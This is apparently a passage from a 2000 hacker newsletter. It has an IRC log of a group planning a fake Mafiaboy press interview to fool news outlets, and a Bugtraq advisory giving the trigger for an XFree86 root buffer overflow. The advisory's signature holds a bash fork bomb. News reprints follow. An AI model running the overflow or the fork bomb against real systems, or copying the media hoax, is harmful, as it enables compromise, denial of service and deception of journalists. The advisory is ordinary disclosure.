for more information. [16:26] fuck no [16:26] are u cruc? [16:27] *** Amoeba (GTO@dialup-*.net) has joined #media-admin [16:27] what time is it right now in EST? 
[16:27] thinking [16:27] Fri May 19 16:35:22 2000 [16:27] might have blown it [16:27] back [16:27] est [16:27] 4:37 est [16:27] Cruci, how? [16:27] this starts tommorow nite [16:27] 9pm EST [16:28] we haven't blown it, we just need to keep quite, either way its gonne be funny [16:28] if Nikitaal really is government then its blown [16:28] [16:03] btw: talking with me is like talking directly to goverment ;-) [16:28] [16:03] * Nikkitaal *waves* on cybercops watching him [16:28] yeah, he said it's a hoax [16:28] hes in my channel [16:28] -> [msg(Nikkitaal)] hey [16:28] -> [msg(Nikkitaal)] cybercop, suck my dick. [16:28] heh [16:28] man [16:28] he knew details on {}'s bust [16:28] cyber cops can't do shit [16:28] and {} left [16:28] well they can but oh well who cares [16:29] also think those splits were accidental? [16:29] they just installed sniffers [16:29] heheheheheheeh [16:29] no shit [16:29] {} and him talked like they knew each other [16:29] they did [16:29] hes a fed agent [16:30] {} said something about that guy being on his box and {} had to help him [16:30] guys [16:30] we aren't doing anything illegal [16:30] chill [16:30] I know [16:30] hehe [16:30] long as no one starts packetting cnn.com heh we're fine [16:30] just don't worry [16:31] isn't it a federal offense to run a hoax on the media, or something like that [16:31] no [16:31] not likely [16:31] its not like we're phonin 911 [16:31] with fake shit [16:32] yeah, and I have nothing to do with this [16:32] heh man [16:32] yer parnoid [16:32] i been raided and told to not even talk to my irc friends [16:32] i laughed [16:32] heh [16:33] well I can't get in trouble with the law [16:33] it would ruin my SAT scores [16:33] neither can i [16:33] if i was worried about this shit [16:33] i wouldn't do it [16:33] if i get caught doin anything illegal with computers i go straight to jail [16:34] hello [16:34] im from tivision (www.tiv.at), austrian tv channel [16:34] here we go. 
[16:34] lol [16:34] k so maybe he's just a pretend fed [16:34] hahaha [16:34] don't know don't care [16:35] I'm starving [16:35] we are nonprofit.. so what are you doing here? [16:35] gonna write yer name down on paper to make sure you get yer chance tommorow night to speak to him. [16:35] (need more info, maybe we can get it into our IT section on tuesday) [16:35] yeah.. but what exactly will happen? just questions for mafiaboy ? [16:35] well mafiaboy feels its important that the world knows what he did, he isn't really a bad person like the media is saying, they are saying he's a evil hacker and everything, when really [16:36] ok cool [16:36] he just feels its important to get the facts straight [16:36] heh [16:36] this is gonna be funny [16:36] i'll call the guy that is responsible for TIV IT [16:36] lol [16:36] *** fraggy (fraggy@*.home.com) has joined #media-admin [16:38] *** fraggy has quit IRC (la de da) [16:39] Slipy, I got 2 mails from you at the same time [16:39] heh [16:39] Should I send it to people? [16:40] Because you may have already done that [16:40] Alot of places will just get it from wired news [16:40] and wired news gets it from the people themselves [16:48] *** k-rad-bob has quit IRC (Ping timeout) [16:50] yeah [16:50] go for it [16:50] spread the word [16:50] just be professional [16:50] no [16:51] heh mafiaboy be online tonite [16:51] leete shit goin on [16:51] heh [16:53] *** Debris has quit IRC (Read error 60: Operation timed out) [16:54] Slipy, what if you already mailed a person? [16:54] what do u mean? [16:55] like if you already contacted a media company [16:55] and then I contact them [16:55] *** Debris (3223@*.net) has joined #media-admin [16:56] *** MrEreet sets mode: +o Debris [16:56] *** MrEreet sets mode: +o Amoeba [16:56] thank you [16:56] aye [16:56] what bout #HWA? 
[16:57] oh well [16:57] go for it [16:58] just keep it real [16:58] ok [16:58] tell no one even yer friends [16:58] its a hoax [16:58] I'll send them the mail you sent me [16:58] k [16:58] sounds good [16:58] need more drugs [16:59] -m the channel its too quiet [16:59] what about mtv? [16:59] I see no media [16:59] heh [16:59] truelife? [16:59] channel is +m [16:59] k [16:59] to keep the hoax quite [16:59] just deal wit it [16:59] heh [16:59] :-)) [16:59] Cruci, I am getting a cable modem [16:59] tommorow nite we get organized better [16:59] tomorrow [16:59] cool [16:59] bbl going out [16:59] aight man [16:59] keep the media attention up [16:59] but it isn't static [16:59] but the hoax down. [16:59] werd [17:00] * MrEreet snickers [17:01] * Amoeba eats a Snickers© [17:01] |ÆÆ8 [17:02] *** debris- (3223@2*.uu.net) has joined #media-admin [17:02] *** MrEreet sets mode: +o Debris [17:04] bbl [17:04] op me in thre other one [17:04] the press release is done [17:05] debris, can I see [17:05] im uploading it [17:05] wait [17:05] is that you too? [17:05] Debris is 3223@*.popsite.net * HEH? [17:05] or an imposter [17:05] free isp [17:05] *** Debris has quit IRC (Read error 54: Connection reset by peer) [17:06] *** MrEreet sets mode: +o debris- [17:06] dont talk in media-event [17:07] yo [17:07] i think z28 should play mafiaboy [17:07] can i chant "hoax" ? [17:07] i think z28 should play mafiaboy [17:07] i think z28 should play mafiaboy [17:07] i think z28 should play mafiaboy [17:07] u know [17:07] i really don't care [17:07] :) [17:07] we gonna hold auditions now? 
[17:07] heh [17:07] dude [17:07] trust me [17:08] z28 is the best at this [17:08] *** debris- changes topic to 'press release www1.thevortex.com' [17:08] oh i know I just don't want a fight to fuck it up [17:08] ask YPiLS he's mafiaboy [17:08] haha [17:08] i'm just watching now [17:08] already caused enuff shit [17:09] read the press release [17:10] heh [17:10] don't really want hwa involved [17:10] The channel will be moderated thus meaning, now questions will be directly posed to Mafiaboy. [17:10] ok z28 isnt doing it [17:10] now should be no [17:10] oh shit [17:10] yeah [17:10] b4 i go out [17:10] any chance [17:11] someone on a .montreal isp [17:11] could [17:11] pose? [17:11] debris i'm lookin yer way [17:11] ;) [17:11] already thought of that but wasn't saying anything [17:11] heh [17:11] we'll see [17:11] well i gotta jet [17:11] i'll talk more tonite [17:11] and try to get a conf up [17:11] have fun [17:11] with REAL mafiaboy [17:11] bbl [17:11] think anyone cares? [17:12] lol [17:12] io think the impending possibility of a retaliatory mass attack was more scary [17:12] the rules debris came up with say that any question the press would want to ask is not allowed [17:12] those are all the questions they ask [17:12] that makes it more legit [17:12] use gov-boi's site instead of hwa in the release [17:12] this isnt a fucking free for all [17:12] or something [17:12] we gotta act like were his godamn lawyers [17:13] ok [17:13] then get rid of the fucking black ass background [17:13] *** debris- sets mode: -o+b Amoeba *!*GTO@*.l3.net [17:13] *** Amoeba was kicked by debris- (death to you) [17:13] its not black [17:13] haha [17:13] don't ban him [17:13] he could spill the beans [17:13] in media-event [17:14] then ill ban him from media event [17:14] hes gay [17:14] wtf was that? 
[17:14] its not black [17:14] -Amoeba- Your message has been recorded, away for 10m45s (bored) [email:ntsecurity00@hotmail.com] [17:14] yes it is [17:14] no it isnt [17:14] BGCOLOR="#00002b" [17:14] fucking retarded fool [17:15] get rid of the background tag [17:15] well then you must be color blind [17:15] no [17:15] its fine [17:15] that might be screwing it up [17:15] ive done this before [17:15] I make webpages for a living [17:15] and that was no fucking reason to ban me [17:15] i create media hoaxes for a living [17:15] *** debris- sets mode: -b *!*GTO@*.vel3.net [17:15] *** Amoeba (GTO@dialup.net) has joined #media-admin [17:15] *** debris- sets mode: +o Amoeba [17:15] werd [17:16] i chose that color scheme for a specific reason, to keep it uniform with g0at security and hwa [17:16] yeh but remove hwa [17:16] it looks like this is part of an organization now [17:16] remove hwa? [17:16] yeh [17:16] now I am going to curse you, because you severly pissed me off [17:16] just have to release some aggression [17:16] you fucking piece of shit [17:16] what the fuck do you think you're doing? [17:16] you are the primortial ooze under my shoe [17:16] *** debris- sets mode: -o+b Amoeba *!*GTO@*.Level3.net [17:16] *** Amoeba was kicked by debris- (sigh) [17:17] *** debris- sets mode: -b *!*GTO@*.Level3.net [17:17] you sure you want hwa out of it [17:17] yup [17:17] oki [17:47] www1.thevortex.com [17:47] too good:) A website was used to post the details of the 'press release' and this was posted in the channel topic... Version #1 05/19/00 - Mafiaboy online press conference http://www.goat-advisory.org g0at security in conjunction with hwa.hax0r.news are pleased to announce a Q and A session with alleged hacker, Mafiaboy. Welcome members of the press and all interested parties. Saturday, May 20 2000, members of the press and the general public have the oppurtunity to query the alleged hacker responsible for the attacks on yahoo.com. 
The interview will begin promptly at 9:00pm EST on the given date on the Eris FreeNet's IRC (Internet Relay Chat) network dubbed, EFnet (instructions on connecting follow). In order to connect to EFnet, please follow these easy steps Visit http://www.mirc.com mIRC.com and download the latest version of the mIRC internet relay chat client. http://home.vpi.net/~hawk/mirc571t.exe Win95/98/00/NT http://home.vpi.net/~hawk/mirc571s.exe Win3.1/3.11 Upon completion of the download, execute the mIRC self-extracting file and install it (it is extremely simple, just follow the instructions Execute the mIRC client. After the splash page, a window should pop up with empty fields. It is very important that you follow these instructions carefully or you will not be admitted into the interview. The window you see, will be labeled 'connect'. Where it is written 'full name', please proceed to input your full name. In the 'e-mail' field, put you're real e-mail address. Under 'nickname', please put the abreviated name of the agency you represent. In the 'alternative' field, please enter the same nickname you have entered, followed by a '-'. Ex) Nickname: BNN | Alternative: BNN-. Next, making sure the minus sign is visible beside the connect option (if it is not, double click it), select the ident section (a sub-option of connect). Select the inable ident server option on the right of your screen. Under USER ID, enter the full name of the agency you represent. Click the ok button at the bottom of your screen. A blank screen should now be in front of you. At the bottom of this screen there should be a text box. In this box type the following to connect to EFnet. /server irc.idle.net and click enter. This should connect you to EFnet. If this does not work, use one of the following alternatives to irc.idle.net: irc.lsl.com, irc.nethead.com, irc.prison.net, irc.concentric.net, irc.freei.net, irc.core.com. A grey window will pop-up once you connect with a list of room names. 
At the top, type #media-event and click the join button. You are now connected. The interview will engage as follows. The channel will be moderated thus meaning, now questions will be directly posed to Mafiaboy. At the beginning of the interview, the nickname of the thirdparty will be divulged. All questions should be asked towards the third party. In order to do so, double click the third party's nickname on the right side of the window and enter your question. Questions will be answered on a first come first serve basis. We ask that you pose one question at a time to give a chance to others. The following is not to be asked and doing such will result in immediate expulsion from the interview: names of accomplices, Mafiaboy's real name, technical questions concerning the tools used and questions concerning the servers involved in the attacks. We also ask that you only message the moderator. Messaging any other of the channel operators including mafiaboy will result in expulsion from the interview. If we find that you are not following one or more rules including the connecting rules, you will be expelled. - g0at security/hwa.hax0r.news Version #2 05/19/00 - Mafiaboy online press conference http://www.goat-advisory.org g0at security is pleased to announce a Q and A session with alleged hacker, Mafiaboy. Welcome members of the press and all interested parties. Saturday, May 20 2000, members of the press and the general public have the oppurtunity to query the alleged hacker responsible for the attacks on yahoo.com. The interview will begin promptly at 9:00pm EST on the given date on the Eris FreeNet's IRC (Internet Relay Chat) network dubbed, EFnet (instructions on connecting follow). In order to connect to EFnet, please follow these easy steps Visit http://www.mirc.com mIRC.com and download the latest version of the mIRC internet relay chat client. 
http://home.vpi.net/~hawk/mirc571t.exe Win95/98/00/NT http://home.vpi.net/~hawk/mirc571s.exe Win3.1/3.11 Upon completion of the download, execute the mIRC self-extracting file and install it (it is extremely simple, just follow the instructions Execute the mIRC client. After the splash page, a window should pop up with empty fields. It is very important that you follow these instructions carefully or you will not be admitted into the interview. The window you see, will be labeled 'connect'. Where it is written 'full name', please proceed to input your full name. In the 'e-mail' field, put you're real e-mail address. Under 'nickname', please put the abreviated name of the agency you represent. In the 'alternative' field, please enter the same nickname you have entered, followed by a '-'. Ex) Nickname: BNN | Alternative: BNN-. Next, making sure the minus sign is visible beside the connect option (if it is not, double click it), select the ident section (a sub-option of connect). Select the inable ident server option on the right of your screen. Under USER ID, enter the full name of the agency you represent. Click the ok button at the bottom of your screen. A blank screen should now be in front of you. At the bottom of this screen there should be a text box. In this box type the following to connect to EFnet. /server irc.idle.net and click enter. This should connect you to EFnet. If this does not work, use one of the following alternatives to irc.idle.net: irc.lsl.com, irc.nethead.com, irc.prison.net, irc.concentric.net, irc.freei.net, irc.core.com. A grey window will pop-up once you connect with a list of room names. At the top, type #media-event and click the join button. You are now connected. The interview will engage as follows. The channel will be moderated thus meaning, now questions will be directly posed to Mafiaboy. At the beginning of the interview, the nickname of the thirdparty will be divulged. All questions should be asked towards the third party.
In order to do so, double click the third party's nickname on the right side of the window and enter your question. Questions will be answered on a first come first serve basis. We ask that you pose one question at a time to give a chance to others. The following is not to be asked and doing such will result in immediate expulsion from the interview: names of accomplices, Mafiaboy's real name, technical questions concerning the tools used and questions concerning the servers involved in the attacks. We also ask that you only message the moderator. Messaging any other of the channel operators including mafiaboy will result in expulsion from the interview. If we find that you are not following one or more rules including the connecting rules, you will be expelled. - g0at security [17:58] flow with it [17:58] who all was contacted anyway? [17:58] the list i posted and who else? [17:58] i dunno [18:00] hehe [18:00] slipy better get back soon to give the url to the media [18:01] he said 30 agencys were notified [18:01] what was the reply email though? [18:01] we wont see responses until late tonight or tomorrow [18:01] he got one from msnbc and zdnet [18:02] and wired? 
[18:02] dunno [18:02] shit [18:02] we should contact the montrealgazette [18:02] i could contact them all again but i don't want to tarnish my rep if it blows up [18:02] heh [18:03] because their coverage of mafiaboy gets wired on southempress which owns all the news papers in canada [18:05] u know it really is a good opportunity for some underground propaganda and statements clearning up bs like ILOVEYOU virus and DeCSS issues from ppl in the scene [18:05] dude [18:05] keep it simple [18:05] well i'm resigned to that now [18:05] just keep it pure mafiaboy and it will make the news [18:06] then we will announce the hoax [18:06] yeh [18:06] like the next day [18:06] they're gonna be bullshit [18:06] heh [18:06] needs a twist tho [18:06] or at least a good message [18:06] just let them ask their questions, answer them intelligently and etc [18:06] not just a hoax for the sake of pulling it off [18:06] ill set up a goat-advisory.org bnc for mafiaboy [18:06] nod [18:08] biagb [18:08] -g [18:09] btw typo_ is media [18:09] this fucking sub wrap thing is messy as fuck [18:09] oh [18:09] shit [18:09] a .at tv show [18:09] oh good [18:09] not even english [18:09] now i'm gay [18:09] omg [18:09] OMG [18:09] rofl [18:10] heg [18:10] heh [18:10] [18:09] yo [18:10] [18:10] is this a hoax or not ? [18:10] ask who he is first [18:10] *** debris- is now known as Debris [18:12] [18:10] btw I am patrick from security.nl [18:12] wtf is security.nl [18:12] [18:12] whom did you send the press release to ? [18:13] crap [18:13] security.nl? [18:13] fuck just tell him to message me ill shut him up [18:14] told him to msg ya [18:15] he's not messaging me [18:15] i must have started shit with him sometime in the past [18:18] guess he doesn't wanna talk to you [18:18] hrm [18:20] no more info needed at this time. tnx [18:20] uh... 
[18:22] heh [18:25] *** YPiLS has quit IRC (Ping timeout: no data for 251 seconds) [18:26] *** i0 (i0@*.no) has joined #media-admin [18:32] Anything new [18:32] chatting with the security dude [18:32] cool guy [18:34] heh [18:35] can't wait [18:35] away back to resident evil (Off/l)(Off/p) (salman@*.com/e) (37543014/uin) [18:49] * Debris is away, went out [log:OFF] [page:OFF] [19:02] [19:07] *** Joins: VetesGirl (Destiny@dyn1-tnt2-206.*.ameritech.net) [19:02] heh [19:02] hmm [19:02] left [19:02] some leet types have joined and split [19:07] is there any shit in the news yet? [19:07] doubt it [19:07] real media will try to contact mafiaboy by phone and he will say he knows nothing about it. [19:08] thats my guess anyay [19:08] it will get mentioned tho [19:08] sentence or two somewhere [19:14] I just woke up [19:25] fucking unreal i can barely stand all this excitement [19:26] should I stir things up a bit or leave it alone? [19:29] leave it [19:29] you don't wanna hype it up that much [19:37] returned (*yawn*) (1h2m50s) [19:39] but [19:39] I'm bored [19:42] how'd you hype it more? [19:45] another thing that would generate media interest is to start discussion about it on various web message boards [19:46] if public shows interest media will pay more attention [19:46] so hit news sites and stuff [19:48] maybe someone should post it to packetstorm and bugtraq? [19:48] anti already got mail sent to i think [19:48] anyone have slashdot access? [19:49] i forgot my pw on slash =\ [19:58] heh [19:58] this is funny [19:58] hrm.. in the ss.. which division do you suppose would handle an event like this? [19:58] they mailed back? [19:58] yep [19:59] heh, coolter there [19:59] ah [19:59] anyone else replied back yet? 
[19:59] no idea my email wasn't used [19:59] :( [20:10] *** sku|| (seksi@dial*.freei.net) has joined #media-admin [20:10] werd [20:18] y0 [20:19] hi [20:19] MrEreet: sku||.....is a whore [20:19] haha [20:19] *** SugarKing sets mode: +v sku|| [20:19] he knows [20:23] *** YPiLS has quit IRC (Ping timeout: no data for 247 seconds) [20:27] back [20:34] *** Amoeba has quit IRC (Ping timeout) [20:36] *** Amoeba (GTO@dialup-*.Level3.net) has joined #media-admin [20:41] -=- [20:41] 20:33] hope you know. [20:41] [20:33] you arent interviewing the 'real' mafiaboy [20:41] [20:33] how do you know this? [20:41] [20:33] because i fucking KNOW MAFIABOY. [20:41] - [20:41] [20:34] will he talk on phone? [20:41] [20:35] you wont get to talk with him AT ALL [20:41] [20:35] fine fuck off then. [20:41] - [20:42] don;t need attitude [20:42] [20:35] IGNORED [20:42] [20:35] i'm not giving you an attitude [20:42] [20:35] i'm just emphasizing those words. [20:42] [20:35] frankly i don't even care [20:42] [20:35] i'm just letting you know [20:42] [20:35] thanks [20:42] - [20:42] 20:36] you wont be getting an interview. [20:42] [20:36] well yeah sure you will [20:42] [20:36] but it wont be with 'mafiaboy' [20:42] [20:36] believe me I have enough info in my zine already [20:42] [20:36] i could care less personally [20:42] [20:36] he has no skill [20:42] [20:36] enough info in your zine? [20:42] [20:36] no concern of mine [20:42] - [20:42] [20:38] ok.. who is the person incharse? [20:42] [20:38] incharge [20:42] [20:38] debris [20:42] [20:39] check the "press release" in the channel topic [20:43] - [20:44] xzrg is ~regg@*.monmouth.com * americunt hair pie [20:44] xzrg on #media-event @#shellz #shells [20:44] xzrg using irc.concentric.net Concentric Network Corporation [20:44] xzrg has been idle 7 secs, signed on Fri May 19 14:52:11 [20:44] - [20:51] hahaha [20:51] guess who that is [20:52] who? 
[20:52] it IS mafiaboy's friend [20:52] lol [20:52] he was dossing as well [20:52] but didn't get caught [20:52] so, is he gonna keep the secret? [20:52] he was? [20:52] yeh [20:52] ya [20:52] what program did they use? [20:52] zombies? [20:52] tfn [20:53] tribal flood network [20:53] see, I know the technical terminology and programs [20:53] yep [20:53] mixter wrote it [20:53] yeah [20:53] and is the real mixter on? [20:53] ya [20:54] cool [20:54] mixter_ thats him [20:54] oh [20:54] he's away [20:54] tuesday may 16th [20:54] #!b0f [20:55] http://b0f.freeBSD.lublin.pl/ [20:55] what is that for? [20:55] oh [20:55] bbl [20:56] ok [21:24] *** sku|| has quit IRC (irc-w.frontiernet.net irc.Prison.NET) [21:32] fucking packet kiddies [21:32] lol [21:53] ? [21:58] *** Debris has quit IRC (Read error 54: Connection reset by peer) [23:00] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98) [23:02] *** Debris (3223@*.uu.net) has joined #media-admin [23:02] *** MrEreet sets mode: +o Debris [23:17] *** Amoeba (GTO@dialup-*.Level3.net) has left #media-admin [23:22] *** SugarKing has quit IRC (Leaving)

Later on the press release site this was posted...

-=-

IT'S A HOAX

This has been a g0at security attempt at getting hits to our currently down, webpage. Although the page is not active at the current instance. Please try it again sometime in the near future. And for those stupid people, no mafiaboy is not giving an interview.

END

@HWA

224.0 [IND] XFree86 3.3.6 buffer overflow to root compromise
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bugtraq

XFree86 3.3.6 (and probably 4.0.0 as well ;) - by running X server (no matter it's setuid, or called from setuid Xwrapper - works in both cases, seems to me Xwrapper in default RH 6.x distro is rather dumb ;) with -xkbmap parameter and over 2100 of 'A's (or shellcode, again, it's rather trivial to exploit :), you'll get beautiful overflow with root privileges in main (Xserver) process... listen to the gdb...
Cannot access memory at address 0x41414141.

This has been tested both with recent RH6.1/6.2 Xservers (3.3.5/3.3.6), and:

XFCom_i810 Version 1.0.0 / X Window System
(protocol Version 11, revision 0, vendor release 6300)
Release Date: October 13 1999

Btw. while testing this bug, we have noticed strange behaviour of some drivers. For example, in one case we get kernel oops, just like that (linux 2.2.14, XFree86 3.3.6 XF86_S3V):

eip: 41414141 eflags: 00013296
eax: 00000000 ebx: 00000000 ecx: 00000bb8 edx: 00000009
esi: bfffe92c edi: 00000400 ebp: 00000000 esp: bfffe464
Stack: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
       41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
       41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
       41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141

:)

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

@HWA

225.0 [MM] Power your PC with a potato!
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://news.bbc.co.uk/hi/english/sci/tech/newsid_759000/759529.stm

Potato-powered computer

Chips with everything, even potatoes

By BBC News Online internet reporter Mark Ward

UK technology enthusiasts have found a way to power a computer using potatoes.

The computer fans, who run a website called Temple ov thee Lemur, decided to build the spud server because someone bet them that it could not be done.

Although science kits that power a digital clock off a potato or two are available, few people have tried anything larger.

Steve Harris, spokesman for the group, said to lighten the load on the potato power pack the group had first to make a low power version of a web server.

Surfers limited

These computers are usually powerful, high-memory versions of the PCs people have on their desks.
But there was no way a bag of potatoes would provide enough power for one of those, said Mr Harris.

For the server the group cannibalised an old computer containing a low-power Intel 386 chip. They removed everything but the central chip and its associated circuitry.

The place of the hard disk was taken by another custom-built chip that had the server software and the two pages of the website permanently "burned" into it.

Even this small server needs around 12 potatoes to power it and the spuds have to be changed every couple of days. Each potato generates about half a volt.

The web pages hosted by the server can be browsed but the machine limits the number of people that can view it every minute to ensure it is not overwhelmed.

Limited hardware

Potatoes can be used as batteries because the flesh of the vegetable acts as a very thick electrolyte - like the acid in a car battery.

When electrodes made of zinc and copper are stuck into the potato the electrochemical reaction produces a power flow. The salty flesh of the potato allows ions to cross from one electrode to another.

Pictures of the potato-powered server are available but Mr Harris said they were taken when the system was not switched on.

"The power connectors were plugged in the wrong way round and it would have been fatal to the hardware if it had been live," he said.

The spud server is the latest in a series of attempts by technology fans to get the most out of very limited hardware.

A Dutch company is making web servers using old Commodore 64 computers that were popular in the mid-1980s.

Several web servers are run off old Amiga computers and there is even a project to turn hand held computers such as the Palm into low volume web servers.

-=-

Subject: Potatoe run server ;)
Author: BHZ
Date: 05-24-2000 19:12

http://152.78.65.48:2300 is the addy :)

UK technology enthusiasts have found a way to power a computer using potatoes.
The computer fans, who run a website called Temple ov thee Lemur, decided to build the spud server because someone bet them that it could not be done.

Although science kits that power a digital clock off a potato or two are available, few people have tried anything larger.

Steve Harris, spokesman for the group, said to lighten the load on the potato power pack the group had first to make a low power version of a web server.

[http://news.bbc.co.uk/hi/english/sci/tech/newsid_759000/759529.stm]

@HWA

226.0 [MM] Mobile phones fertile for E-bugs
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.newscientist.com/news/news_223928.html

Is your phone infected?

Mobiles are fertile ground for e-bugs of the future

IN THE wake of the Love Bug virus attack, computer scientists are warning that future viruses aimed at intelligent mobile phones and personal digital assistants (PDAs) may be even worse. They could record your conversations and forward them to others, delete money from "electronic wallets", or perhaps rack up huge telephone bills.

"These viruses could spread rapidly in future," predicts David Chess, an antivirus researcher at IBM's T. J. Watson Research Center in Yorktown Heights, New York.

Computer viruses attack devices that are programmable, and spread when there is some link between one device and another. Early viruses spread mainly via infected discs handed from user to user. Today the main avenue of infection is by e-mail. "The thing that makes viruses a threat is that we're so well connected," says Charles Palmer, a specialist in network security and cryptography research at IBM. This suggests there is a huge potential for viruses to spread via future programmable mobiles.

In current and next-generation phones, and in PDAs, designers have several ways to prevent virus damage. First, they can limit the devices' programmability, leaving them without the capacity to run viruses.
Current phones already fall into this category--but future generations will be much more capable.

Another option is to store important programs in read-only memory so that a virus cannot overwrite them. "The drawback then is that the phone cannot be upgraded," says Edward Felton, a computer scientist at the Secure Internet Programming Laboratory at Princeton University in New Jersey. And this strategy cannot protect data that the user adds, as it must be stored in a writable memory. "A virus that changes your mom's number to a premium-rate number in Nigeria could rack up huge bills," says Palmer.

Finally, it is possible to ensure that a phone's built-in programs are separate, so that one program cannot start another. If the virus cannot dial out, it cannot spread.

But researchers say there is huge pressure on cellphone designers to add functions, and that this will increase the chances of infection. "If somebody sends you a telephone number by e-mail, you want to be able to click on that number to dial it," says Avi Ruben, a specialist in Internet security at the AT&T Laboratories in Florham Park, New Jersey.

"I know that there are prototypes in development that allow this kind of threat," adds Felton. When e-mail attachments can trigger other applications, they could dial out, start recording software for personal surveillance, or wipe out the contents of files such as electronic wallets.

However, Charles Davies, chief technology officer for the British PDA maker Psion, argues that this scenario is unlikely, at least for devices that run the widely used EPOC operating system, which he helped to design. "I don't want to seem smug or complacent but I just don't see it as a big threat," he says.

Palmer sees the way forward in mathematical proofs that show whether a system is secure, and calls for more research into the area. "It's the only choice we have in the long run," he says.
Justin Mullins

@HWA

227.0 [MM] The virtual threat
      ~~~~~~~~~~~~~~~~~~~~~~~

http://www.economist.com/editorial/freeforall/current/index_survey.html

THE most remarkable thing about the effect of the Internet on the financial-services sector is not how pervasive it has been; it is how limited a transformation it has so far wrought. Financial institutions, after all, deal in a product—money—that for many of their customers has long been “virtual”. Bank-account holders are used to the notion that their cash is represented by a series of numbers on a monthly statement generated by a computer, or by the glowing green figures of a cash machine. And they have become accustomed to making payments using pieces of plastic backed with a clever magnetic strip. The Internet might have been designed for the distribution, monitoring and management of this ubiquitous electronic commodity.

More worryingly for the firms that make their living out of arranging financial transactions, the Internet might also have been designed to do away with them. Banks and other financial firms are intermediaries, standing between lenders and borrowers, savers and spenders. For decades, banks in rich countries have been fretting about how to cope with “disintermediation”: lenders dealing direct with borrowers (as many do already in the capital markets), without using a bank’s balance sheet to add a layer of cost. The Internet is, potentially, the greatest force for disintermediation the banks have ever had to tackle. Other intermediaries, such as retailers, face the same problem. But money, unlike, say, an item of clothing, is a commodity that can actually be used, transferred and delivered electronically.

Samuel Theodore, of Moody’s, a credit-rating agency, believes the banks are currently undergoing their “fourth disintermediation”.
The first involved savings, and the growth of mutual funds, specialised pension funds and life-insurance policies at the expense of bank deposits; the second saw the capital markets take on some of the banks’ traditional role as providers of credit; in the third, advances in technology helped to streamline back-office operations. Now, in the fourth stage, the distribution of banking products is being disintermediated. This process has been going on for some years, with the spread of automated teller machines (ATMs) and, over the past decade or so, telephone banking and PC-based proprietary systems; but the Internet hugely enlarges its scope. Spotty youth Yet, except for one activity, share-trading, and one part of the world, Scandinavia, Internet-based financial retailing is, if not in its infancy, then scarcely at puberty. And wholesale banking, although it relies heavily on complex electronic trading systems and information technology, is still conducted mostly on closed proprietary networks. To be sure, there are some signs that the disintermediation the industry fears may be starting. Internet banks, with their low costs—and their dot.com habit of paying more attention to the acquisition of customers than the turning of profits—have drawn deposits away from offline banks in some countries. And in the capital markets, bond issues and share offerings have been syndicated and distributed over the Internet. Some highly rated borrowers have for years been borrowing through their own issues of commercial paper. The Internet can only enhance the appeal of do-it-yourself fund-raising. But these are just the early signs of an upheaval that is gathering momentum by the day. There are a number of reasons why many online financial services have been slow to catch on, and why they can now be expected to develop faster. Concerns about the security of Internet transactions, a particularly important issue for financial dealings, are gradually being eased. 
Internet use, even in the rich world, has been patchy, but is spreading fast. And whereas conducting financial transactions online up to now has often been clunky and annoying, the technology is improving all the time. Those technological advances are also liberating the Internet from the confines of the PC (see article). Most important, financial institutions themselves, which in the past have often resisted change, may now become its most ardent promoters. Having invested heavily in their own systems, banks were understandably reluctant to jettison them for web-based replacements. And adapting their own processes for the Internet has often proved cumbersome and difficult. Moreover, until recently banks faced little pressure from their customers to change what were seen as useful but boring services, much the same as electricity and gas. But soon, in many countries, customers will expect an online service as a matter of course. The banks’ staff, too, have been reluctant to abandon the old ways of doing things. Besides, those old ways have often been extremely profitable, so change threatens not just working habits, but the bottom line too. Now, however, almost every financial firm, from the swankiest Wall Street investment bank to the provider of microcredit to the very poor, has found that it has no choice but to invest in an “Internet strategy”. And having invested in it, it will need to persuade its customers to use it. So in areas where the advantages of doing business online may not be obvious to the consumer—notably in retail banking—the banks may find themselves trying to coax, bribe and bully reluctant customers online. The banks’ conservatism, on which they used to pride themselves, has become an embarrassment. It has also been spotted by the new breed of Internet entrepreneur taking aim at the banks’ business. 
The models are firms such as E*Trade and Charles Schwab, discount stockbrokers that found in the Internet a means of challenging even the biggest and most prestigious traditional firms. Now commercial and investment banks, fund managers and financial advisers are all vying with each other to present themselves as Internet-savvy, and boasting about their investment in online services. All this has created a strange, contradictory world. Clever young things with a bright idea and a few million dollars of venture capital behind them talk cheerily of the demise of traditional banks. Bill Gates, no less, said six years ago that banking is necessary, but banks are not. Now, the story goes, they are irredeemably hampered by their “legacy systems”—their existing management structures, staffing levels and computers—and by their “channel conflicts”—between what they do now, and online methods of sales and distribution. Their bosses simply do not “get it”. Or, even if they do, their institutions are so deeply rooted in the old economy and pre-Internet styles of business that there is no point in turning them around. The dinosaurs in the supposedly stuffy offices of these big banks and securities firms appear unaware that a meteorite may be on its way to obliterate them. On the contrary, resolutely upbeat online-service managers, often rather self-conscious in their tieless, suitless new-economy uniforms, claim they are having the times of their lives. Never has technology revealed so many new avenues for developing the business. It is, says Denis O’Leary, who runs Chase Manhattan’s Chase.com, “a golden age”. Not least because, in the industrialised West, many firms have been making bigger profits than ever. Years of economic expansion and bull markets have yielded good income from traditional lending, from trading and from investment. The only obvious cloud in the sky is that banks’ share prices seem not to reflect this (see chart 1). 
